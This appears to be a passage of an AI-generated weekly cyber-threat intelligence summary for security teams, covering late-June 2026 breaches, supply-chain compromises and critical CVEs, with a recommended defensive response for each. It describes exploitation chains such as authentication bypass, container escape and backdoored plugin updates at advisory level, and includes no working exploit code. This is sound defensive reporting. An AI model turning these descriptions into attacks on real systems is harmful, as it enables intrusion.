# CTI Weekly Summary — 2026-W26 (Jun 22 – Jun 28, 2026)

> **AI-generated content — no human review.** This weekly summary was produced autonomously by an LLM (Anthropic Claude; the specific model was withheld from this run's self-identification context) with parallel research and verification by sub-agents (Claude Sonnet 4.6 and a second Anthropic Claude model whose specific identity was withheld from this run's self-identification context) executing the prompt at `prompts/weekly-summary.md` as a Claude Code routine on Anthropic-managed cloud infrastructure. No human reviewed or edited this output before publication. All facts are linked inline to public sources or to the underlying daily briefs in this repository. Verify any operationally critical claim against the linked primary source before acting.

**Generated by:** Anthropic Claude (specific model not determined) · **Sub-agents:** W1: Claude Sonnet 4.6 · W2: Claude Sonnet 4.6 · verify: Claude Sonnet 4.6, Anthropic Claude (specific model not determined) · **Audience:** SOC management, IR, Threat Hunting · **Classification:** TLP:CLEAR · **Language:** English · **Prompt:** v2.64

## 0. Week at a glance

- **NAIC breached through an Oracle PeopleSoft zero-day (CVE-2026-35273); ShinyHunters dumps 3.1 TB and US rating-agency feeds stall** — the same UNC6240 campaign GTIG has tracked against ~100 orgs (68% higher education) is still acquiring victims; treat internet-reachable PeopleSoft as assume-compromise. ([daily 06-28](briefs/2026-06-28.md), [NAIC](https://content.naic.org/about/security-update))
- **FortiBleed escalates from credential exposure to confirmed AD domain takeover at a NATO-aligned defence contractor** — patch level is irrelevant; rotate any FortiGate credential active May–June and hunt AD persistence. ([daily 06-24](briefs/2026-06-24.md), [CISA](https://www.cisa.gov/news-events/alerts/2026/06/18/cisa-urges-hardening-fortinet-devices-after-reports-of-credential-exposure))
- **ShapedPlugin's official WordPress update channel shipped backdoored Pro plugins** — credential, 2FA-secret and web-shell theft straight from the trusted pipeline. ([daily 06-23](briefs/2026-06-23.md), [Wordfence](https://www.wordfence.com/blog/2026/06/psa-supply-chain-compromise-targets-shapedplugin-backdoored-pro-plugins-distributed-via-official-channels/))
- **The Klue/Icarus Salesforce OAuth breach widened to ~24 named firms, then the attacker was itself hacked and a second extortion group emerged listing ~195 organisations** — one dormant integration token cascading into multi-tenant CRM theft. ([daily 06-27](briefs/2026-06-27.md), [SecurityWeek](https://www.securityweek.com/more-klue-breach-victims-identified-as-hackers-get-hacked/))
- **The Gentlemen ransomware makes Switzerland the second-most-targeted European country, claims 478 victims and adds worm propagation** — ESET's leaked-data deep-dive shows victims are chosen on FortiGate misconfiguration, tying the pipeline to FortiBleed reconnaissance. ([daily 06-27](briefs/2026-06-27.md), [inside-it.ch](https://www.inside-it.ch/aufstrebende-ransomware-bande-findet-mehr-schweizer-opfer-20260626))
- **The week's research converges on the trust chain, not the perimeter** — a "Developer Credential Economy" feeding npm worms into AI-coding-agent session hooks, OAuth-grant abuse, and a Browser-in-the-Middle PhaaS (Bluekit) that defeats Device Bound Session Credentials. ([daily 06-28](briefs/2026-06-28.md), [Tenable](https://www.tenable.com/blog/what-the-miasma-campaign-reveals-about-the-new-supply-chain-threat-model-and-the-underground))
- **Turla's new STOCKSTAY backdoor (GTIG) broadens Russia-nexus espionage toward Western-European foreign-policy targets** — delivered via WinRAR CVE-2025-8088 and malicious RDP files; relevant to Swiss/EU governmental entities with Ukraine-adjacent policy work. ([daily 06-26](briefs/2026-06-26.md), [Google GTIG](https://cloud.google.com/blog/topics/threat-intelligence/stockstay-turla-intelligence-gathering))
- **Policy: the Netherlands' NIS2 law cleared its lower house (entry into force targeted for 1 July); the EU CRA reporting obligation is ~75 days out (11 September)** — enforceable Dutch notification clocks are imminent and CRA SRP onboarding should start. ([NL Digital Government](https://www.nldigitalgovernment.nl/nis2-directive-cyberbeveiligingswet-cbw/), [ENISA SRP](https://www.enisa.europa.eu/topics/product-security-and-certification/single-reporting-platform-srp))

## 1. Highest-impact events — what's on fire if no one acted

Two genuinely new escalations this week meet the inaction-=-incident bar; the week's other on-fire items (FortiBleed, The Gentlemen, the Klue/Icarus cascade) were already consolidated in 2026-W25 and are carried forward as status updates in §§ 2 and 8.

### NAIC breached through an Oracle PeopleSoft zero-day; ShinyHunters dumps 3.1 TB and US rating-agency feeds stall

**If you did nothing this week:** any internet-reachable Oracle PeopleSoft instance is a live pre-auth foothold — the same zero-day path that put the US National Association of Insurance Commissioners into ShinyHunters' hands, and PeopleSoft is widely deployed across European public administration, higher education and HR/finance back offices. The W25 looking-ahead flagged that ShinyHunters PeopleSoft notifications were still landing and that EU universities were a probable next-named class; NAIC is the fresh high-profile confirmation that the campaign is still acquiring victims.

NAIC — the standard-setting body for all 50 US state insurance regulators — [confirmed on 2026-06-26](https://content.naic.org/about/security-update) that an unauthorised party reached its environment on June 11 via an Oracle PeopleSoft vulnerability, then pivoted from PeopleSoft to temporary access to data-storage areas. ShinyHunters claims 3.1 TB exfiltrated ([TechRadar](https://www.techradar.com/pro/security/naic-confirms-data-breach-with-shinyhunters-claiming-3-1tb-of-data-stolen-in-oracle-zero-day-attack), [Insurance Journal](https://www.insurancejournal.com/news/national/2026/06/25/875334.htm)). The operational tell is the downstream impact NAIC itself disclosed: credit-rating agencies paused their data feeds and NAIC suspended assigning designations to insurer investments — a regulatory-process outage, not just a data-confidentiality event. This is the same PeopleSoft exploitation wave (CVE-2026-35273, the unauthenticated RCE in PeopleTools Environment Management) Google GTIG attributes to UNC6240/ShinyHunters and has been tracking against the education sector — 68% of identified targets were higher-education institutions; see § 8 for the campaign-level status. Treat any externally-reachable PeopleSoft portal (`/PSEMHUB/`, `/PSIGW/HttpListeningConnector`) as a hunt target, not a patch-later item. ([daily 06-28](briefs/2026-06-28.md))

— *Source: [NAIC security update](https://content.naic.org/about/security-update) · [Insurance Journal](https://www.insurancejournal.com/news/national/2026/06/25/875334.htm) · [TechRadar](https://www.techradar.com/pro/security/naic-confirms-data-breach-with-shinyhunters-claiming-3-1tb-of-data-stolen-in-oracle-zero-day-attack) · [Daily brief 06-28](briefs/2026-06-28.md) · Tags: data-breach, zero-day, actively-exploited, organized-crime · Region: us, europe · Sector: finance, public-sector · CVE: CVE-2026-35273 · CVSS: 9.8 · Vector: zero-click · Auth: pre-auth · Status: exploited · Evidence: "Unauthorized access to a portion of the NAIC's environment was identified on June 11 via an Oracle PeopleSoft vulnerability. While in PeopleSoft, the unauthorized party was able to obtain information needed to gain temporary access to certain data storage areas." (NAIC); "Due to the incident, certain credit rating agencies have paused their data feeds and consequently, the NAIC has temporarily suspended assigning designations to insurer investments." (NAIC)*

### ShapedPlugin's official update channel shipped backdoored WordPress Pro plugins — credential, 2FA-secret and web-shell theft

**If you did nothing this week:** any site running the ShapedPlugin Pro plugins that auto-updated through the licensed channel pulled backdoor code straight from the vendor — patch level was no defence, because the trusted distribution pipeline itself was the attacker. The malicious `LicenseLoader.php` loads inside the WordPress admin panel, fetches a second stage, installs it as a fake plugin and self-deletes to frustrate forensics.

Wordfence [disclosed on 2026-06-22](https://www.wordfence.com/blog/2026/06/psa-supply-chain-compromise-targets-shapedplugin-backdoored-pro-plugins-distributed-via-official-channels/) that an attacker breached ShapedPlugin's build and Easy Digital Downloads distribution pipeline and injected backdoor code into the Pro (paid) releases of three plugins, served through official update channels. The implant harvests credentials and 2FA secrets and drops a web shell ([BleepingComputer](https://www.bleepingcomputer.com/news/security/shapedplugin-update-flow-hacked-to-infect-wordpress-sites/)). For a public-sector or education estate that runs WordPress behind a CMS team, the hunt is for the fake-plugin artefact and unexpected `LicenseLoader.php` execution in the admin context, plus credential/2FA rotation for any admin who logged in during the exposure window — not merely "update the plugin." ([daily 06-23](briefs/2026-06-23.md))

— *Source: [Wordfence](https://www.wordfence.com/blog/2026/06/psa-supply-chain-compromise-targets-shapedplugin-backdoored-pro-plugins-distributed-via-official-channels/) · [BleepingComputer](https://www.bleepingcomputer.com/news/security/shapedplugin-update-flow-hacked-to-infect-wordpress-sites/) · [Daily brief 06-23](briefs/2026-06-23.md) · Tags: supply-chain, data-breach, actively-exploited, patch-available · Region: global, europe · Sector: technology, public-sector · CVE: CVE-2026-10735 · CVSS: 9.8 · Vector: user-interaction · Auth: pre-auth · Status: exploited, patch-available · Evidence: "Attackers compromised the vendor's build and distribution pipeline, injecting backdoor code into Pro plugin releases distributed through official licensed update channels" (Wordfence); "The malicious packages contained a file named LicenseLoader.php, which was loaded automatically within the WordPress admin panel ... downloaded a second-stage payload, installed it as a fake plugin ... and then deleted itself to hinder forensic analysis" (BleepingComputer)*

## 2. Multi-day campaigns and chains

### Klue / Icarus Salesforce OAuth-integration breach — from nine named victims to ~24, then the attacker gets hacked

This is the W25 multi-day item, but the in-window deltas re-shape it materially. At the start of the week the named-victim list stood at nine, mostly cybersecurity vendors (HackerOne, Huntress, Jamf, OneTrust and others, [SecurityWeek 06-23](https://www.securityweek.com/more-cybersecurity-firms-disclose-impact-from-klue-hack/)). It then accreted through the week: 8x8 [filed an SEC 8-K Item 1.05 on 06-23](https://www.sec.gov/Archives/edgar/data/0001023731/000102373126000084/eght-20260617.htm) confirming Salesforce exfiltration; [BeyondTrust and LastPass disclosed](https://www.securityweek.com/beyondtrust-lastpass-impacted-by-klue-salesforce-incident/) business-contact and sales data theft on 06-25; by 06-27 [roughly two dozen firms](https://www.securityweek.com/more-klue-breach-victims-identified-as-hackers-get-hacked/) had notified, and in a twist the Icarus attacker was itself hacked, with a second extortion actor now threatening the stolen data. Salesforce disabled the Klue connected app.

The new lens the dailies could not assemble: this is a single dormant OAuth integration credential at one SaaS vendor cascading into multi-tenant CRM theft across that vendor's entire customer base — the exact failure mode ReliaQuest framed as "integration abused in CRM data theft" in W25. For a Swiss/EU SOC the takeaway is an OAuth-grant inventory exercise: enumerate third-party connected apps with API scopes into your CRM/identity tenants, revoke dormant grants, and alert on bulk REST/Bulk-API reads from integration principals — patching nothing here helps, because no software was vulnerable; a delegated token was. ([daily 06-23](briefs/2026-06-23.md), [daily 06-25](briefs/2026-06-25.md), [daily 06-27](briefs/2026-06-27.md))

— *Source: [SecurityWeek — victims identified, hackers hacked](https://www.securityweek.com/more-klue-breach-victims-identified-as-hackers-get-hacked/) · [SEC EDGAR — 8x8 Form 8-K](https://www.sec.gov/Archives/edgar/data/0001023731/000102373126000084/eght-20260617.htm) · [SecurityWeek — BeyondTrust/LastPass](https://www.securityweek.com/beyondtrust-lastpass-impacted-by-klue-salesforce-incident/) · [Daily brief 06-23](briefs/2026-06-23.md) · Tags: data-breach, supply-chain, identity, cloud, organized-crime · Region: global, europe · Sector: technology, finance*

### ShinyHunters (UNC6240) — one cluster, multiple reported tradecraft paths in one week

The week is a compact case study in how a single extortion cluster's *reported* activity spans very different initial-access tradecraft. The two firmly UNC6240-attributed events are the Oracle PeopleSoft zero-day behind the NAIC breach (GTIG/Mandiant attribution, § 1) and the April 2026 Instructure Canvas LMS breach, whose UK Cyber Monitoring Centre [sector review](https://www.computerweekly.com/news/366645159/Canvas-breach-hit-160-UK-unis-but-caused-limited-damage) landed 06-27 (160 UK universities, extortion, ransom paid). Alongside them, [404 Media's reconstruction](https://www.404media.co/how-hackers-broke-into-madison-square-garden/) (06-26) showed the Madison Square Garden intrusion began with a single vishing call into the company's identity platform — the operator phoned a low-level employee and talked them through authorising access; the 404 Media account documents the technique but names no actor, and the ShinyHunters link rests on the operators' own claims and the SSO-vishing TTP overlap [Abnormal Security](https://abnormal.ai/blog/shinyhunters-sso-social-engineering-mfa-identity-compromise) attributes to the cluster.

The cross-day pattern matters more than any single victim: a server-side zero-day, a SaaS-platform compromise and SSO-targeting vishing all appear under (or adjacent to) one extortion banner in one week, so defending against this cluster is not a single control. It is externally-reachable enterprise-app patching/hunting, third-party SaaS exposure management, and help-desk/identity-platform vishing resistance (callback verification, no MFA-reset-on-call) — all at once. ([daily 06-26](briefs/2026-06-26.md), [daily 06-27](briefs/2026-06-27.md), [daily 06-28](briefs/2026-06-28.md))

— *Source: [Computer Weekly — Canvas/CMC review](https://www.computerweekly.com/news/366645159/Canvas-breach-hit-160-UK-unis-but-caused-limited-damage) · [404 Media — MSG vishing](https://www.404media.co/how-hackers-broke-into-madison-square-garden/) · [Abnormal Security — ShinyHunters SSO vishing TTP](https://abnormal.ai/blog/shinyhunters-sso-social-engineering-mfa-identity-compromise) · [Daily brief 06-26](briefs/2026-06-26.md) · Tags: organized-crime, data-breach, identity, phishing · Region: uk, us, europe · Sector: education, media, public-sector*

### npm supply-chain worms — a sustained wave across the week

Three separate npm-ecosystem supply-chain events were in play across the window, and the pattern is the story. Microsoft attributed the [Mastra scope compromise](https://www.bleepingcomputer.com/news/security/microsoft-links-mastra-ai-supply-chain-attack-to-north-korean-hackers/) (140+ `@mastra` packages, `postinstall` dropper) to North Korea's Sapphire Sleet (covered in the daily on 06-21). JFrog documented [PostCSS typosquats](https://research.jfrog.com/post/from-postcss-typosquat-to-windows-rat/) from the `abdrizak` account delivering a Nuitka-compiled Python RAT with Chrome DPAPI credential theft. And on 2026-06-25 Socket reported a [fresh Miasma / "Mini Shai-Hulud" worm wave](https://socket.dev/blog/miasma-mini-shai-hulud-hits-leoplatform-npm-packages-go-ecosystem) across LeoPlatform/RStreams packages (carried in the daily 06-27), the self-propagating supply-chain worm last seen backdooring `@redhat-cloud-services`.

The synthesis: the npm registry is under continuous, parallel pressure from a state actor (DPRK), commodity typosquat crews and a self-replicating worm — three different operators, one ecosystem. The common control is the same one npm v12 is about to enforce by default: disable install scripts (`--ignore-scripts`), pin and review dependencies, and treat CI build-time package resolution as an attack surface. ([daily 06-21](briefs/2026-06-21.md), [daily 06-24](briefs/2026-06-24.md), [daily 06-27](briefs/2026-06-27.md))

— *Source: [Socket Security — Miasma](https://socket.dev/blog/miasma-mini-shai-hulud-hits-leoplatform-npm-packages-go-ecosystem) · [JFrog — PostCSS RAT](https://research.jfrog.com/post/from-postcss-typosquat-to-windows-rat/) · [Microsoft — Mastra](https://www.microsoft.com/en-us/security/blog/2026/06/17/postinstall-payload-inside-mastra-npm-supply-chain-compromise/) · [Daily brief 06-27](briefs/2026-06-27.md) · Tags: supply-chain, infostealer, north-korea-nexus, organized-crime · Region: global · Sector: technology*

## 3. Vulnerability roll-up

Operationally critical CVEs of the week, by exploitation status. Each entry carries status-this-week-vs-first-covered. KEV listing is treated as jurisdiction-agnostic exploitation confirmation; KEV *deadlines* are US-FCEB compliance dates and carry no operational weight here.

### CVE-2026-12569 — PTC Windchill / FlexPLM: pre-auth deserialization RCE, now confirmed exploited with JSP web shells (CISA KEV)

When first covered (06-20) and in the W25 weekly this was a pre-auth deserialization flaw with BSI escalating to admins out-of-hours. The in-window delta: CISA [added it to KEV on 06-25](https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html) and JSP web-shell deployment against the login interface is now confirmed in the wild. Any internet-reachable Windchill PDMLink or FlexPLM instance should be treated as assume-compromise — manufacturing and defence-supplier PLM is exactly the externally-reachable engineering surface a Swiss/EU industrial estate forgets to inventory.

— *Source: [The Hacker News](https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html) · [ENISA EUVD EUVD-2026-37831](https://euvd.enisa.europa.eu/enisa/eu_vulnerability_database/EUVD-2026-37831) · [Daily brief 06-27](briefs/2026-06-27.md) · Tags: vulnerabilities, actively-exploited, rce, pre-auth, cisa-kev · Region: global, europe · Sector: manufacturing, defense · CVE: CVE-2026-12569 · CVSS: 9.3 · Vector: zero-click · Auth: pre-auth · Status: exploited, cisa-kev, patch-available*

### CVE-2026-20245 — Cisco Catalyst SD-WAN Manager: Mandiant reconstructs the full zero-day chain

Mandiant (GTIG) [published the first complete TTP chain](https://cloud.google.com/blog/topics/threat-intelligence/zero-day-exploitation-cisco-catalyst-sd-wan-manager) on 06-24 for the Catalyst SD-WAN Manager zero-day activity, observed at a service provider: a peering/authentication bypass (CVE-2026-20127, CVE-2026-20182) leading to credential manipulation, then local privilege escalation to root via a malicious CSV upload (CVE-2026-20245) to plant a root backdoor. NCSC-CH [posted on it](https://security-hub.ncsc.admin.ch/#/posts/12579), giving it direct Swiss relevance. Telco and public-sector SD-WAN operators should hunt for unexpected file writes under the web-UI service account and root-owned artefacts post-dating the patch.

— *Source: [Google Mandiant (GTIG)](https://cloud.google.com/blog/topics/threat-intelligence/zero-day-exploitation-cisco-catalyst-sd-wan-manager) · [Cisco PSIRT](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-privesc-4uxFrdzx) · [Daily brief 06-27](briefs/2026-06-27.md) · Tags: vulnerabilities, actively-exploited, priv-esc, rce, patch-available · Region: global, switzerland · Sector: telco, public-sector · CVE: CVE-2026-20245 · CVSS: 7.8 · Vector: local · Auth: post-auth · Status: exploited, patch-available*

### CVE-2025-67038 — Lantronix EDS5000 serial-to-IP converters: unauthenticated command injection to root (BRIDGE:BREAK, CISA KEV)

Forescout Vedere Labs' [BRIDGE:BREAK research](https://www.forescout.com/blog/exploiting-serial-to-ethernet-converters-in-critical-infrastructure/) documented an unauthenticated OS command-injection flaw in Lantronix EDS5000-series device servers — the HTTP management interface concatenates unsanitised input into a shell call. The in-window development is its CISA KEV listing on 2026-06-23 with confirmed in-the-wild exploitation (covered in [daily 06-24](briefs/2026-06-24.md)) — the first BRIDGE:BREAK flaw to flip from research to active abuse. Serial-to-IP converters sit in front of OT, building-management and medical serial devices; firmware 2.0.0R1 closes it. This is an energy/water/healthcare exposure, not an IT one.

— *Source: [Forescout Vedere Labs — BRIDGE:BREAK](https://www.forescout.com/blog/exploiting-serial-to-ethernet-converters-in-critical-infrastructure/) · [SecurityWeek](https://www.securityweek.com/serial-to-ip-converter-flaws-expose-ot-and-healthcare-systems-to-hacking/) · [Daily brief 06-24](briefs/2026-06-24.md) · Tags: vulnerabilities, actively-exploited, cisa-kev, pre-auth, rce, ot-ics, patch-available · Region: global, europe · Sector: energy, manufacturing, water · CVE: CVE-2025-67038 · CVSS: 9.8 · Vector: zero-click · Auth: pre-auth · Status: exploited, cisa-kev, patch-available*

### CVE-2026-34908 / CVE-2026-34909 / CVE-2026-34910 — Ubiquiti UniFi OS Server: pre-auth RCE chain, exploited (CISA KEV)

Three max-severity (CVSS 10.0) flaws in UniFi OS Server — improper access control and path traversal that bypass authentication and reach an unauthenticated RCE endpoint — were [patched and KEV-listed](https://www.bleepingcomputer.com/news/security/ubiquiti-patches-three-max-severity-unifi-os-vulnerabilities/) with confirmed exploitation. UniFi controllers are common in DACH SME, education and public-sector branch networks; the management plane is frequently exposed. Patch and audit controller-account integrity.

— *Source: [BleepingComputer](https://www.bleepingcomputer.com/news/security/ubiquiti-patches-three-max-severity-unifi-os-vulnerabilities/) · [SC Media](https://www.scworld.com/brief/ubiquiti-unifi-os-server-vulnerabilities-allow-unauthenticated-remote-code-execution) · [Daily brief 06-24](briefs/2026-06-24.md) · Tags: vulnerabilities, actively-exploited, cisa-kev, pre-auth, rce, auth-bypass, patch-available · Region: global, europe, dach · Sector: public-sector, healthcare, education · CVE: CVE-2026-34908, CVE-2026-34909, CVE-2026-34910 · CVSS: 10.0 / 10.0 / 10.0 · Vector: zero-click · Auth: pre-auth · Status: exploited, cisa-kev, patch-available*

### CVE-2026-20230 — Cisco Unified CM WebDialer: pre-auth SSRF to arbitrary root file write, reconnaissance-stage scanning observed

Cisco PSIRT's advisory describes an SSRF in the WebDialer service of Unified CM 14/15 that lets an unauthenticated attacker write files to the OS and later escalate to root. The in-window signal: [exploitation moved to reconnaissance stage](https://www.bleepingcomputer.com/news/security/cisco-unified-cm-sme-flaw-cve-2026-20230-now-exploited-in-attacks/), with a PoC that fingerprints vulnerable devices. Unified CM is core telephony for many cantonal and hospital networks — patch before the scanning becomes exploitation.

— *Source: [Cisco PSIRT advisory cisco-sa-cucm-ssrf-cXPnHcW](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssrf-cXPnHcW) · [BleepingComputer](https://www.bleepingcomputer.com/news/security/cisco-unified-cm-sme-flaw-cve-2026-20230-now-exploited-in-attacks/) · [Daily brief 06-24](briefs/2026-06-24.md) · Tags: vulnerabilities, actively-exploited, pre-auth, poc-public, patch-available, rce · Region: global · Sector: technology · CVE: CVE-2026-20230 · CVSS: 8.6 · Vector: zero-click · Auth: pre-auth · Status: exploited, poc-public, patch-available*

### CVE-2026-43503 (DirtyClone) and CVE-2026-46331 (pedit COW) — Linux kernel LPE with public weaponised PoCs

Two page-cache-corruption local-privilege-escalation flaws drew working exploits within the window. JFrog [published a full DirtyClone walkthrough](https://research.jfrog.com/post/dissecting-and-exploiting-linux-lpe-variant-dirtyclone-cve-2026-43503/) (XFRM/IPsec skb cloning) on 06-25; a companion `tc act_pedit` out-of-bounds write (`pedit COW`) gained a [weaponised PoC](https://thehackernews.com/2026/06/new-linux-pedit-cow-exploit-enables.html) within a day of assignment. Both are post-auth root escalation on patched-but-unrebooted hosts — prioritise kernel updates on multi-tenant and internet-exposed Linux where an initial foothold is plausible.

— *Source: [JFrog Security Research](https://research.jfrog.com/post/dissecting-and-exploiting-linux-lpe-variant-dirtyclone-cve-2026-43503/) · [Red Hat RHSB-2026-008](https://access.redhat.com/security/vulnerabilities/RHSB-2026-008) · [The Hacker News — pedit COW](https://thehackernews.com/2026/06/new-linux-pedit-cow-exploit-enables.html) · [Daily brief 06-27](briefs/2026-06-27.md) · Tags: vulnerabilities, lpe, priv-esc, poc-public, patch-available · Region: global · CVE: CVE-2026-43503, CVE-2026-46331 · CVSS: 8.8 (CVE-2026-43503), n/a (CVE-2026-46331) · Vector: local · Auth: post-auth · Status: poc-public, patch-available*

### CVE-2026-58053 — Gitea `act_runner` Docker backend: container-hardening bypass to host escape (public PoC, ENISA-critical)

Gitea `act_runner` through 0.262.0 passes a workflow-defined `container.options` string straight into Docker's `HostConfig`, forcing only `Privileged=false` while merging `--pid=host`, `--cap-add` and `--security-opt` unchanged — a malicious workflow escapes the job container to the host ([VulnCheck](https://www.vulncheck.com/advisories/gitea-act-runner-container-hardening-bypass-via-workflow-container-options)). Public PoC, CVSS 9.4, mitigation-only this week. Self-hosted Gitea CI is common in DACH developer shops and universities; restrict who can define workflow container options. The companion Gitea-core auth bypass via `X-WEBAUTH-USER` (CVE-2026-20896, [fixed in 1.26.3/1.26.4](https://blog.gitea.com/release-of-1.26.3-and-1.26.4)) remains worth patching on the same estate.

— *Source: [VulnCheck advisory](https://www.vulncheck.com/advisories/gitea-act-runner-container-hardening-bypass-via-workflow-container-options) · [ENISA EUVD EUVD-2026-58053](https://euvd.enisa.europa.eu/enisa/eu_vulnerability_database/EUVD-2026-58053) · [Daily brief 06-28](briefs/2026-06-28.md) · Tags: vulnerabilities, poc-public, priv-esc, rce, enisa-critical · Region: global, europe, switzerland · Sector: public-sector, education, technology · CVE: CVE-2026-58053 · CVSS: 9.4 · Vector: user-interaction · Auth: post-auth · Status: poc-public, enisa-critical, mitigation-only*

### CVE-2026-11800 (JWT algorithm-confusion) and CVE-2026-9800 (policy-enforcer authz bypass) — Keycloak identity-plane fixes

Keycloak 26.6.4 [fixed eight CVEs](https://www.keycloak.org/2026/06/keycloak-2664-released). The headline flaw is CVE-2026-11800, a JWT algorithm-confusion that lets an attacker with valid client credentials forge an assertion, bypass signature verification and impersonate any federated user behind the affected identity provider ([GHSA-gqj5-2xp5-3qmp](https://github.com/advisories/GHSA-gqj5-2xp5-3qmp), [BSI WID-SEC-2026-2093](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2093)); the bundled CVE-2026-9800 is a separate policy-enforcer authorization bypass via incorrect URI comparison. Keycloak is the IdP of choice across European public-sector, healthcare and finance deployments — these are identity-plane breaks, not app bugs. Patch to 26.6.4.

— *Source: [Keycloak Project release notes](https://www.keycloak.org/2026/06/keycloak-2664-released) · [GitHub Advisory GHSA-gqj5-2xp5-3qmp](https://github.com/advisories/GHSA-gqj5-2xp5-3qmp) · [BSI WID-SEC-2026-2093](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2093) · [Daily brief 06-28](briefs/2026-06-28.md) · Tags: vulnerabilities, auth-bypass, identity, patch-available · Region: europe, switzerland, global · Sector: public-sector, finance, healthcare, education · CVE: CVE-2026-11800, CVE-2026-9800 · CVSS: 8.1 / 8.1 · Vector: zero-click · Auth: post-auth · Status: patch-available*

### CVE-2026-55200 / CVE-2026-55199 — libssh2 heap out-of-bounds write with public PoC

The GitHub Security Advisory [GHSA-r8mh-x5qv-7gg2](https://github.com/advisories/GHSA-r8mh-x5qv-7gg2) describes a heap out-of-bounds write in libssh2's `ssh2_transport_read()` that fails to enforce an upper bound on the `packet_length` field (CVSS 9.2), with a companion pre-auth DoS (CVE-2026-55199) corroborated by [NCSC-NL NCSC-2026-0210](https://advisories.ncsc.nl/2026/ncsc-2026-0210.html); public PoC code was reported within the window (see [daily 06-28](briefs/2026-06-28.md)). An upstream fix has landed (the GHSA references the fix commit), but tagged-release availability still varies across the binding and appliance ecosystem — so the operational task is SBOM exposure tracking and chasing each embedding vendor's release, not a single library bump (see § 11 caveat). libssh2 is embedded in a long tail of management tooling, appliances and language bindings.

— *Source: [GitHub Advisory GHSA-r8mh-x5qv-7gg2](https://github.com/advisories/GHSA-r8mh-x5qv-7gg2) · [NCSC-NL NCSC-2026-0210](https://advisories.ncsc.nl/2026/ncsc-2026-0210.html) · [Daily brief 06-28](briefs/2026-06-28.md) · Tags: vulnerabilities, poc-public, rce, dos · Region: global · Sector: technology · CVE: CVE-2026-55200, CVE-2026-55199 · CVSS: 9.2 / 8.2 · Vector: user-interaction · Auth: pre-auth · Status: poc-public, patch-available*

## 4. Sector & victim patterns

### Public administration & government

The week's public-sector signal is heavily Swiss/European. NCSC-CH reported an [active Microsoft 365 "voicemail" phishing wave](https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2026/wochenrueckblick_25.html) in Switzerland delivering infostealers and harvesting M365 credentials, with chain-phishing onward from compromised mailboxes. The [Swiss Federal Audit Office reported](https://www.swisscybersecurity.net/news/2026-06-19/neue-cyberaufsicht-kaempft-mit-anlaufschwierigkeiten) that the two-year-old split of federal cyber-governance leaves strategic oversight without a complete incident picture — a structural finding for any federated public administration. Further afield, Ukraine's postal operator Ukrposhta had [digital services disrupted](https://therecord.media/ukraine-state-postal-operator-reports-disruption) by an overnight attack, and Brazil's national Cell Broadcast alert platform was [hijacked to push fake emergency messages](https://thenextweb.com/news/brazil-civil-defense-alert-hack-misanthropy-cell-broadcast) to ~30M phones — a reminder that government alerting infrastructure is itself a target.

— *Source: [NCSC-CH Wochenrückblick Week 25](https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2026/wochenrueckblick_25.html) · [SwissCybersecurity.net — EFK audit](https://www.swisscybersecurity.net/news/2026-06-19/neue-cyberaufsicht-kaempft-mit-anlaufschwierigkeiten) · [The Record — Ukrposhta](https://therecord.media/ukraine-state-postal-operator-reports-disruption) · Tags: phishing, hacktivism, data-breach · Region: switzerland, europe · Sector: public-sector*

### Healthcare

Third-party processors drove the week's healthcare exposure. [Xsolis](https://www.hipaajournal.com/xsolis-data-breach/), a healthcare-AI utilization-management vendor, disclosed a phishing-driven breach affecting 1,396,519 patients across seven US health systems — the data sat at the processor, not the hospitals. The UK's HCRG Care Group [began notifying patients](https://hipaapulse.com/uk-more-than-one-year-later-hcrg-is-first-notifying-patients-of-33ec763c) of a February 2025 Medusa ransomware attack — a 16-month notification lag. The Lantronix BRIDGE:BREAK flaw (§ 3) additionally exposes serial-attached medical devices.

— *Source: [HIPAA Journal — Xsolis](https://www.hipaajournal.com/xsolis-data-breach/) · [HIPAA Pulse — HCRG](https://hipaapulse.com/uk-more-than-one-year-later-hcrg-is-first-notifying-patients-of-33ec763c) · Tags: data-breach, ransomware, supply-chain · Region: us, uk, europe · Sector: healthcare*

### Education

Education was a structural victim class. The ShinyHunters Canvas/Instructure breach [hit 160 UK universities](https://www.computerweekly.com/news/366645159/Canvas-breach-hit-160-UK-unis-but-caused-limited-damage) per the UK CMC sector review (ransom paid, limited downstream damage). The unpatched ILIAS 11.0 SQL-injection ([CVE-2026-12789](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2016), PoC-public, no patch) directly exposes the DACH learning-management estate, and self-hosted Gitea CI (§ 3) is concentrated in universities. The common thread: education runs exposed CMS/LMS/forum and developer stacks with thin operational security.

— *Source: [Computer Weekly — Canvas](https://www.computerweekly.com/news/366645159/Canvas-breach-hit-160-UK-unis-but-caused-limited-damage) · [BSI WID-SEC-2026-2016 — ILIAS](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2016) · Tags: data-breach, vulnerabilities, sqli · Region: uk, dach, europe · Sector: education*

### Technology & SaaS supply chain — the week's busiest victim class

The dominant pattern of the week was the third party as entry vector: Klue/Icarus (Salesforce OAuth, ~24 firms), ShapedPlugin (WordPress build pipeline), the npm worm wave, 8x8's SEC-disclosed Salesforce theft, and the BadBlocker Chrome extension (§ 6). In nearly every case the victim organisation patched nothing wrong of its own — the compromise rode in through a trusted vendor, integration token, package or browser extension.

— *Source: [SecurityWeek — Klue victims](https://www.securityweek.com/more-klue-breach-victims-identified-as-hackers-get-hacked/) · [Wordfence — ShapedPlugin](https://www.wordfence.com/blog/2026/06/psa-supply-chain-compromise-targets-shapedplugin-backdoored-pro-plugins-distributed-via-official-channels/) · Tags: supply-chain, data-breach, identity · Region: global, europe · Sector: technology*

## 5. Incidents & disclosures recap

The week's disclosures cluster around two recurring root causes: third-party/SaaS exposure and social-engineering entry. Read as a defender's learning summary rather than a chronology.

### Social engineering and SSO abuse opened the highest-profile intrusions

